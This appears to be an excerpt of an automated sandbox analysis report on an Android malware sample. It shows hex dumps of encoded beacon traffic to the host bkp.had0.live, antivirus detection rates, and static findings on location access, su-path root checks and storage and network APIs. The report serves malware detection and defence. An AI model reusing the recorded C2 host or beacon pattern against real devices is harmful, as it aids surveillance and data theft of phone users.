73 57 56 70 76 75 6d 30 48 41 6a 2b 4b 64 51 75 6c 46 69 4e 71 6b 46 57 68 34 6b 56 43 58 6a 2f 4d 4f 52 76 79 57 30 6b 7a 66 51 7a 49 39 5a 6b 6f 61 35 50 55 51 4d 64 53 32 76 2b 63 34 30 46 47 61 44 32 6e 43 46 6f 38 7a 34 62 62 48 5a 47 76 71 77 52 32 69 39 48 45 42 6f 38 57 71 74 31 4d 6c 59 77 76 4c 65 4c 41 67 46 45 52 54 36 54 61 62 7a 58 65 64 4c 33 53 54 6a 35 33 63 4d 6f 71 6f 32 44 6c 47 73 43 54 4a 76 4f 4d 4e 70 46 47 68 6b 34 69 43 6c 77 44 70 4f 56 6d 51 2f 6d 2b 39 51 71 66 74 48 54 56 6f 72 78 41 79 75 6d 54 6e 6f 35 53 56 68 58 79 2f 43 57 78 38 6c 32 70 6d 4c 31 4b 6c 39 33 78 41 4b 72 6a 77 44 53 6b 50 58 6e 37 73 57 67 59 77 77 52 4f 35 58 42 33 4e 71 75 41 62 56 37 55 62 70 4c 57 42 48 71 75 62 53 6d 76 4f 49 6b 38 5a 32 48 6a 46 2f 76 6f 51 43 7a 6d 77 30 45 77 58 49 68 4a 62 54 30 2f 50 38 7a 7a 38 36 42 48 64 72 51 67 35 58 30 62 75 4f 62 37 7a 36 74 53 4f 45 58 57 71 78 4d 6e 4b 7a 42 64 33 63 59 6b 44 4a 35 47 6d 39 73 42 41 58 52 2f 31 39 32 4d 62 77 67 50 63 68 71 67 58 58 37 64 61 61 6b 69 38 67 49 47 4f 5a 51 68 74 79 56 62 33 35 46 59 69 4c 43 48 62 4a 36 78 30 74 65 43 47 43 79 4c 45 33 63 41 42 52 6b 44 39 4b 43 44 64 67 79 42 51 59 4a 38 74 7a 64 6a 34 7a 65 63 38 45 75 52 4c 7a 36 53 72 69 4c 6f 79 41 31 79 44 69 68 56 62 55 32 5a 7a 4b 74 77 71 6f 74 31 63 4c 36 57 74 37 53 69 42 38 74 38 50 72 30 38 70 34 44 4c 38 Data Ascii: {"hash":"TLN7HpdpX3+eohBKANtzsgLgKCwis3LXWSJJHDeyk04=","id":"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
Sep 28, 2023 14:34:19.564970970 CEST	70	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 28 Sep 2023 12:34:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Last-Modified: Fri, 03 Mar 2023 18:07:28 GMT ETag: W/"592-5f602d176fbd2" Content-Encoding: gzip Data Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 6d 6f d3 30 10 fe be 5f 71 04 81 40 22 71 d3 8e 8d a6 69 a4 d1 6e 62 12 8c 89 15 01 1f bd e4 9a 78 4b ec 60 5f 5f c2 c4 7f c7 4e ba b6 d3 00 f1 01 57 aa 92 7b 79 9e e7 ce 77 89 9f 4c 3f 4e 66 df 2e 4f a1 a0 aa 84 cb cf 6f df 9f 4f c0 f3 19 fb 32 98 30 36 9d 4d e1 eb bb d9 87 f7 10 06 3d b8 22 2d 52 62 ec f4 c2 03 af 20 aa 23 c6 56 ab 55 b0 1a 04 4a e7 6c f6 89 ad 1d 4a e8 d2 36 8f be 69 73 82 8c 32 2f 39 88 5b 92 75 55 4a 33 fe 0d 40 38 1c 0e bb 3c cf 05 45 25 97 f9 d8 43 e9 c1 f6 29 89 0b e4 59 72 00 f6 c4 24 a8 c4 e4 b0 77 08 cf ab 8c 9b 62 04 17 8a e0 4c 2d 64 16 b3 ce d9 05 56 48 1c 1c 9f 8f df 17 62 39 f6 26 4a 12 4a f2 67 4d 8d 1e a4 dd db d8 23 5c 13 73 fc 23 48 0b ae 0d d2 f8 f3 ec cc 7f e3 b1 7d 20 c9 2b 1c 7b 19 9a 54 8b 9a 84 92 7b 08 57 4a eb e6 15 d4 3c 47 90 56 cc dc 89 d9 a6 1b 6a 4a 04 b2 a4 1b ae d4 18 af f3 b9 73 ad b2 06 ee e6 16 cb 37 e2 07 46 e1 61 bd b6 4a 54 a9 74 f4 f4 b8 3d 23 68 dd 73 5e 89 b2 89 b8 16 dc 6a 75 50 3e 2f 45 2e a3 d4 aa 40 3d fa b9 c5 2c c2 07 88 6f 7a 7b 90 c3 e1 c9 f1 c9 d9 08 2a ae 73 21 23 38 b6 4e e8 b9 df 3e 40 1f ee ba 78 78 3a 3d 3d 9a bc 9e 3e d4 00 1b 11 3b 12 e8 b7 24 ad 61 85 22 2f 28 b2 a5 95 d9 08 4a 24 ab ce 37 35 4f 85 cc 23 f0 43 17 78 4f ef 0f 5a fa c1 d0 1a 77 fc 35 dc ad 44 46 45 34 e8 60 1f 17 bb 01 f0 4b 9c 53 c4 17 a4 46 1b 83 6e b9 5b cb 7d 0c a9 3a 82 81 ab 73 c7 90 89 e5 7f e1 d8 21 f2 a8 14 f2 76 d7 b7 c1 e1 eb c1 d1 c9 83 80 a5 30 82 30 fb 6b 0c 4f 49 2c f1 af 21 85 5a a2 fe 43 44 cc da 79 b3 6b c7 ba a5 39 88 dd 84 6d 66 b1 4e 62 bb 13 1a e7 db 4d e4 59 25 64 80 6b 5e d5 25 06 a9 aa 98 97 3c b2 c5 8c 27 31 ab 37 20 45 e8 d6 cf e2 87 f7 86 7e 72 e9 66 7f 6f 11 ad a9 f3 d9 3e ef 66 fd 9c c0 20 56 06 a8 e0 64 ff b0 db 99 46 2d 60 85 da 2e 89 6e ec 88 00 29 d0 c8 d3 02 32 85 a6 dd 28 5c 0b 43 c0 65 53 29 8d af 40 69 7b 35 cd 35 82 20 28 b8 81 9b 85 f5 56 b6 2b 59 b0 e5 fa 66 41 53 2e c1 10 d7 36 35 e7 42 c2 5c ab aa a5 fd 97 2e 14 aa 42 57 b8 63 cb 15 5c f3 f4 d6 29 db a6 de f0 25 ef be 06 d1 b3 7e af b0 02 95 6e 82 5c bd f0 c3 97 5e 52 6b 5c 0a b5 30 6d 85 0e 26 d8 5c 4f db 90 98 75 97 12 b7 1f 9e e4 e0 17 63 2a 81 73 92 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 2d3Tmo0_q@"qinbxK`__NW{ywL?Nf.OoO206M="-Rb #VUJlJ6is2/9[uUJ3@8<E%C)Yr$wbL-dVHb9&JJgM#\s#H} +{T{WJ<GVjJs7FaJTt=#hs^juP>/E.@=,oz{s!#8N>@xx:==>;$a"/(J$75O#CxOZw5DFE4`KSFn[}:s!v00kOI,!ZCDyk9mfNbMY%dk^%<'17 E~rfo>f VdF-`.n)2(\CeS)@i{55 (V+YfAS.65B\.BWc\)%~n\^Rk\0m&\Oucs0

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.30	33850	135.181.49.35	80

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2023 14:35:34.816485882 CEST	87	OUT	POST /ping HTTP/1.1 Content-Type: application/json; charset=UTF-8 Content-Length: 4343 Host: bkp.had0.live Connection: Keep-Alive Accept-Encoding: gzip User-Agent: okhttp/4.2.1 Data Raw: 7b 22 68 61 73 68 22 3a 22 54 4c 4e 37 48 70 64 70 58 33 2b 65 6f 68 42 4b 41 4e 74 7a 73 67 4c 67 4b 43 77 69 73 33 4c 58 57 53 4a 4a 48 44 65 79 6b 30 34 3d 22 2c 22 69 64 22 3a 22 76 34 43 71 69 44 33 6c 41 62 72 76 73 66 6e 72 79 76 51 65 66 58 4b 69 64 54 39 36 58 67 52 61 57 4a 78 76 58 68 71 35 4a 66 31 6d 4b 70 41 38 52 6d 6e 34 58 2f 2f 5a 48 39 2b 47 67 56 38 34 79 71 35 39 49 45 6c 6a 43 73 4f 65 69 6e 2f 59 54 61 74 63 4a 54 4e 37 78 31 73 45 71 59 4b 46 4d 2f 69 62 6c 67 4f 71 7a 4d 55 44 6b 4c 36 78 6c 62 49 72 56 34 47 32 71 58 42 61 68 59 53 32 36 78 4e 4b 55 54 7a 55 71 35 76 39 4f 4b 37 48 44 50 4e 66 42 42 42 35 45 31 66 59 52 79 45 64 54 6a 6a 73 6b 63 61 6f 74 33 55 4f 63 53 33 36 64 7a 52 64 50 4e 56 74 6e 73 42 55 50 32 64 55 56 65 53 55 56 47 34 34 6d 30 4d 39 46 65 75 43 31 78 49 44 5a 71 61 6a 33 67 67 43 44 41 2f 68 72 44 62 50 30 41 70 77 4d 72 66 76 38 61 4a 53 42 45 42 33 4c 6f 66 4f 4e 55 57 7a 6f 2b 47 73 65 33 39 2b 64 32 4a 51 71 68 4e 36 55 75 4a 36 4b 61 61 65 39 32 4e 46 6b 2f 44 65 6f 49 67 72 50 58 69 36 59 6c 71 4b 5a 41 4c 4e 4e 53 33 33 69 4b 59 66 2f 4c 54 37 4d 50 76 7a 79 71 76 45 71 76 79 71 6e 6b 50 53 2f 48 4d 34 66 33 50 47 6e 7a 58 4e 71 32 43 77 67 72 34 34 51 79 55 48 73 38 63 73 59 64 33 61 42 4b 78 72 63 75 77 66 32 36 31 2b 7a 6f 70 46 54 57 72 55 2f 49 64 66 57 65 64 72 72 76 70 30 45 71 51 42 59 44 63 73 68 71 68 48 4c 6b 4d 4d 69 45 66 44 6c 73 4d 52 48 76 37 31 74 36 71 4c 6e 37 74 33 61 79 72 4d 65 31 73 6a 52 54 6b 43 66 31 49 43 6c 33 32 67 59 6d 62 42 6a 58 71 51 66 32 41 64 42 45 73 38 70 44 68 78 54 6c 48 44 52 2b 76 70 70 4d 49 67 72 44 52 37 2f 39 70 66 74 4e 6d 6a 75 4f 6b 7a 74 4a 43 32 68 59 46 57 53 62 7a 79 41 4a 38 5a 68 65 73 46 4e 72 61 78 37 33 32 46 6b 49 75 51 67 6a 37 5a 71 4a 73 6b 55 6a 74 4f 30 2f 47 45 5a 59 49 5a 73 56 78 57 49 71 34 43 72 4f 5a 74 6a 7a 34 53 62 39 5a 72 72 57 53 4f 6e 7a 76 5a 31 6c 63 48 6b 5a 43 39 52 6d 32 71 69 49 54 4b 5a 2f 4d 31 76 67 71 52 36 47 2b 61 4e 48 6c 42 72 47 46 5a 79 76 74 38 75 72 45 35 55 44 54 6d 57 4f 36 4c 55 33 50 46 33 33 77 46 79 79 69 33 31 58 4d 6e 48 38 57 2b 61 77 65 47 6f 42 5a 4d 34 42 6c 46 37 49 6c 68 48 73 6a 78 57 31 42 76 66 47 4b 2f 58 67 5a 4b 4a 58 66 62 6d 70 64 51 42 7a 62 77 68 6b 46 66 43 77 6e 55 61 39 4e 49 65 32 32 72 61 51 4d 37 57 45 45 52 4f 42 6c 4b 34 30 37 79 54 6a 6e 31 30 38 56 65 6c 72 51 6f 78 6b 76 52 30 32 46 6d 51 66 76 53 2f 65 4f 57 55 32 4c 75 34 70 52 34 54 42 46 41 55 5a 62 52 68 52 65 59 32 46 62 6c 6e 63 72 4c 38 44 37 78 4f 74 59 47 39 2b 68 66 50 65 41 53 4a 53 63 42 78 65 4b 35 61 30 65 7a 63 6e 31 75 72 30 6b 31 56 4d 56 35 47 44 70 37 51 33 39 68 78 5a 71 43 76 44 39 54 70 4a 64 61 62 65 61 4a 46 6a 61 73 49 53 6b 4d 77 67 6b 37 76 69 4f 5a 77 6c 78 6c 4c 74 6c 54 42 6d 70 70 2f 35 4e 46 39 55 7a 6d 2f 56 45 2f 31 66 4a 31 32 7a 33 2f 57 79 63 2b 41 51 4b 45 42 75 36 57 57 43 57 51 34 4f 30 64 64 4d 73 64 68 51 49 41 6b 50 56 43 53 32 4e 58 35 4c 76 78 7a 54 30 54 56 38 7a 4b 58 44 6f 50 75 63 44 53 6c 57 7a 42 65 63 78 63 64 4a 76 32 4c 4a 46 5a 77 6c 59 30 61 78 45 30 34 59 45 35 71 6d 71 52 74 42 4b 68 48 52 65 47 4f 69 57 79 74 54 4a 39 52 2b 44 41 44 73 62 71 65 5a 52 69 72 45 6a 57 4a 76 37 2b 5a 32 2f 79 78 51 69 47 41 44 2f 66 6e 4c 43 52 42 36 47 66 34 76 65 31 69 2b 34 34 30 64 47 52 4d 56 70 4a 71 76 55 56 78 54 73 62 72 74 50 65 46 71 36 46 34 50 6a 55 53 43 59 7a 62 51 6f 63 75 65 56 34 63 63 64 56 58 44 7a 4d 63 31 79 4f 6f 37 54 39 68 6d 46 64 4e 72 5a 65 50 53 74 48 74 58 64 76 5a 6b 32 59 4a 4f 68 5a 36 46 4a 6b 55 2b 70 6e 6f 33 66 76 4d 45 74 70 2b 51 30 6e 56 52 47 38 4b 36 4b 34 64 75 47 49 45 4f 53 65 32 47 62 74 4b 72 2b 6b 57 71 69 78 76 53 78 2b 5a 4b 49 57 4f 73 44 4f 6b 32 39 30 53 70 73 41 2f 50 66 6a 56 63 6b 54 4f 34 4c 4f 63 51 50 6e 71 77 39 44 66 62 54 69 53 68 36 56 7a 61 48 69 43 56 61 35 70 39 6d 33 45 53 57 74 67 74 2b 57 53 73 36 4e 39 72 75 6b 30 58 6e 6f 44 36 4d 41 6a 4b 4f 5a 54 2f 51 58 79 6e 62 39 43 34 74 6b 4b 6a 4f 57 69 46 70 62 4a 6b 70 47 50 5a 59 57 52 73 33 47 77 56 50 48 75 4e 62 4e 58 72 Data Ascii: {"hash":"TLN7HpdpX3+eohBKANtzsgLgKCwis3LXWSJJHDeyk04=","id":"v4CqiD3lAbrvsfnryvQefXKidT96XgRaWJxvXhq5Jf1mKpA8Rmn4X//ZH9+GgV84yq59IEljCsOein/YTatcJTN7x1sEqYKFM/iblgOqzMUDkL6xlbIrV4G2qXBahYS26xNKUTzUq5v9OK7HDPNfBBB5E1fYRyEdTjjskcaot3UOcS36dzRdPNVtnsBUP2dUVeSUVG44m0M9FeuC1xIDZqaj3ggCDA/hrDbP0ApwMrfv8aJSBEB3LofONUWzo+Gse39+d2JQqhN6UuJ6Kaae92NFk/DeoIgrPXi6YlqKZALNNS33iKYf/LT7MPvzyqvEqvyqnkPS/HM4f3PGnzXNq2Cwgr44QyUHs8csYd3aBKxrcuwf261+zopFTWrU/IdfWedrrvp0

Source: Vezmhoup7U	ReversingLabs: Detection: 34%
Source: Vezmhoup7U	Virustotal: Detection: 38%			Perma Link

Source: com.unionpay.UPPayAssistEx;->a:213	API Call: android.location.Location.getLatitude
Source: com.unionpay.UPPayAssistEx;->a:221	API Call: android.location.Location.getLongitude
Source: com.unionpay.mobile.android.nocard.views.bh;->a:96	API Call: android.location.Location.getLatitude
Source: com.unionpay.mobile.android.nocard.views.bh;->a:104	API Call: android.location.Location.getLongitude

Source: Lcom/unionpay/UPPayAssistEx;->a(Landroid/content/Context;Z)Ljava/lang/String;	Method string: "/system/bin/su"
Source: Lcom/alipay/sdk/sys/b;->b()Z	Method string: "/system/bin/su"
Source: Lcom/alipay/sdk/sys/b;->b()Z	Method string: "/system/xbin/su"
Source: Lcom/unionpay/mobile/android/utils/f;->d(Landroid/content/Context;)Ljava/lang/String;	Method string: "/system/bin/su"
Source: Lcom/unionpay/mobile/android/utils/f;->b()Ljava/lang/String;	Method string: "/system/bin/su"

Source: com.alipay.apmobilesecuritysdk.a.a;->b:98	API Call: android.os.Environment.getExternalStorageDirectory
Source: com.kwai.video.player.a.h;->a:4	API Call: android.os.Environment.getExternalStorageState
Source: com.kwai.video.player.a.h;->a:7	API Call: android.os.Environment.getExternalStorageDirectory
Source: com.huawei.hms.availableupdate.d;->a:24	API Call: android.os.Environment.getExternalStorageState
Source: com.alipay.security.mobile.module.b.b;->c:28	API Call: android.os.Environment.getExternalStorageState
Source: com.kwai.video.b.a;-><clinit>:2	API Call: android.os.Environment.getExternalStorageDirectory
Source: com.alipay.security.mobile.module.b.b;->l:247	API Call: android.os.Environment.getExternalStorageState
Source: com.alipay.security.mobile.module.b.b;->l:250	API Call: android.os.Environment.getExternalStorageDirectory
Source: com.alipay.security.mobile.module.c.c;->a:2	API Call: android.os.Environment.getExternalStorageDirectory
Source: com.alipay.security.mobile.module.c.c;->a:8	API Call: android.os.Environment.getExternalStorageState
Source: com.alipay.security.mobile.module.c.c;->a:14	API Call: android.os.Environment.getExternalStorageDirectory
Source: com.alipay.apmobilesecuritysdk.f.a;->a:44	API Call: android.os.Environment.getExternalStorageDirectory
Source: com.xiaomi.push.b;->a:1	API Call: android.os.Environment.getExternalStorageState
Source: com.xiaomi.push.b;->b:5	API Call: android.os.Environment.getExternalStorageState
Source: com.xiaomi.push.b;->e:13	API Call: android.os.Environment.getExternalStorageDirectory
Source: com.kwai.video.hodor.util.b;->a:33	API Call: android.os.Environment.getExternalStorageDirectory
Source: com.unionpay.mobile.android.utils.k;->a:13	API Call: android.os.Environment.getExternalStorageDirectory
Source: com.unionpay.mobile.android.utils.p;->a:1	API Call: android.os.Environment.getExternalStorageDirectory
Source: com.unionpay.utils.j;->a:13	API Call: android.os.Environment.getExternalStorageDirectory
Source: com.hhmedic.android.sdk.base.utils.HHDirUtils;->getCacheDirectory:14	API Call: android.os.Environment.getExternalStorageState
Source: com.hhmedic.android.sdk.base.utils.HHDirUtils;->getExternalCacheDir:30	API Call: android.os.Environment.getExternalStorageDirectory
Source: com.hhmedic.android.sdk.base.utils.HHImageUtils;->convertUri:12	API Call: android.os.Environment.getExternalStorageDirectory
Source: com.unionpay.mobile.android.nocard.views.l;->a:214	API Call: android.os.Environment.getExternalStorageState
Source: com.unionpay.mobile.android.nocard.views.l;->a:223	API Call: android.os.Environment.getExternalStorageDirectory

Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->isInternetConnected:592	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->isInternetConnected:593	API Call: android.net.NetworkInfo.isConnected
Source: com.alipay.apmobilesecuritysdk.a.a;->a:252	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.alipay.apmobilesecuritysdk.a.a;->a:253	API Call: android.net.NetworkInfo.isConnected
Source: com.huawei.hms.android.SystemUtils;->getNetType:14	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.huawei.hms.android.SystemUtils;->getNetType:15	API Call: android.net.NetworkInfo.isAvailable
Source: com.alipay.security.mobile.module.b.b;->o:299	API Call: android.net.wifi.WifiManager.isWifiEnabled
Source: com.alipay.security.mobile.module.b.b;->r:347	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.huawei.hms.framework.common.NetworkUtil;->getDnsServerIpsFromConnectionManager:7	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.huawei.hms.framework.common.NetworkUtil;->getDnsServerIpsFromConnectionManager:9	API Call: android.net.ConnectivityManager.getNetworkInfo
Source: com.huawei.hms.framework.common.NetworkUtil;->getNetworkInfo:139	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.huawei.hms.framework.common.NetworkUtil;->getNetworkStatus:153	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.huawei.hms.framework.common.NetworkUtil;->getNetworkStatus:154	API Call: android.net.NetworkInfo.getDetailedState
Source: com.huawei.hms.framework.common.NetworkUtil;->getNetworkType:174	API Call: android.net.NetworkInfo.isConnected
Source: com.huawei.hms.framework.common.NetworkUtil;->isNetworkAvailable:228	API Call: android.net.NetworkInfo.isConnected
Source: com.alipay.android.phone.mrpc.core.q;->d:124	API Call: android.net.ConnectivityManager.getAllNetworkInfo
Source: com.alipay.android.phone.mrpc.core.q;->d:125	API Call: android.net.NetworkInfo.isAvailable
Source: com.alipay.android.phone.mrpc.core.q;->d:126	API Call: android.net.NetworkInfo.isConnectedOrConnecting
Source: com.alipay.android.phone.mrpc.core.q;->d:165	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.alipay.android.phone.mrpc.core.q;->d:166	API Call: android.net.NetworkInfo.isAvailable
Source: com.kwai.video.wayne.player.f.f;->b:27	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.kwai.video.wayne.player.f.f;->c:30	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.kwai.video.wayne.player.f.f;->c:31	API Call: android.net.NetworkInfo.isConnected
Source: com.kwai.video.wayne.player.f.f;->d:34	API Call: android.net.ConnectivityManager.getNetworkInfo
Source: com.kwai.video.wayne.player.f.f;->d:35	API Call: android.net.NetworkInfo.isConnected
Source: com.huawei.hms.hatool.h;->a:17	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.huawei.hms.hatool.h;->a:18	API Call: android.net.NetworkInfo.isConnected
Source: com.kwai.video.hodor.NetworkMonitor;->onNetworkChange:85	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.kwai.video.hodor.NetworkMonitor;->onNetworkChange:95	API Call: android.net.NetworkInfo.isConnected
Source: com.kwai.video.hodor.NetworkMonitor;->onNetworkChange:99	API Call: android.net.NetworkInfo.getState
Source: com.kwai.video.hodor.NetworkMonitor;->onNetworkChange:105	API Call: android.net.NetworkInfo.isConnected
Source: com.kwai.video.hodor.NetworkMonitor;->onNetworkChange:108	API Call: android.net.NetworkInfo.getState
Source: com.huawei.updatesdk.a.a.d.i.a;->a:1	API Call: android.net.NetworkInfo.isConnected
Source: com.huawei.updatesdk.a.a.d.i.a;->a:5	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.huawei.updatesdk.a.a.d.i.a;->d:14	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.huawei.updatesdk.a.a.d.i.a;->d:15	API Call: android.net.NetworkInfo.isConnected
Source: com.bumptech.glide.manager.e;->a:17	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.bumptech.glide.manager.e;->a:18	API Call: android.net.NetworkInfo.isConnected
Source: com.alipay.sdk.net.a;->b:133	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.alipay.sdk.net.a;->c:135	API Call: android.net.NetworkInfo.isAvailable
Source: com.kwai.player.network.KwaiNetworkMonitorAutoDetect$b;->a:5	API Call: android.net.NetworkInfo.isConnected
Source: com.kwai.player.network.KwaiNetworkMonitorAutoDetect$b;->a:25	API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.kwai.player.network.KwaiNetworkMonitorAutoDetect$b;->a:29	API Call: android.net.ConnectivityManager.getNetworkInfo
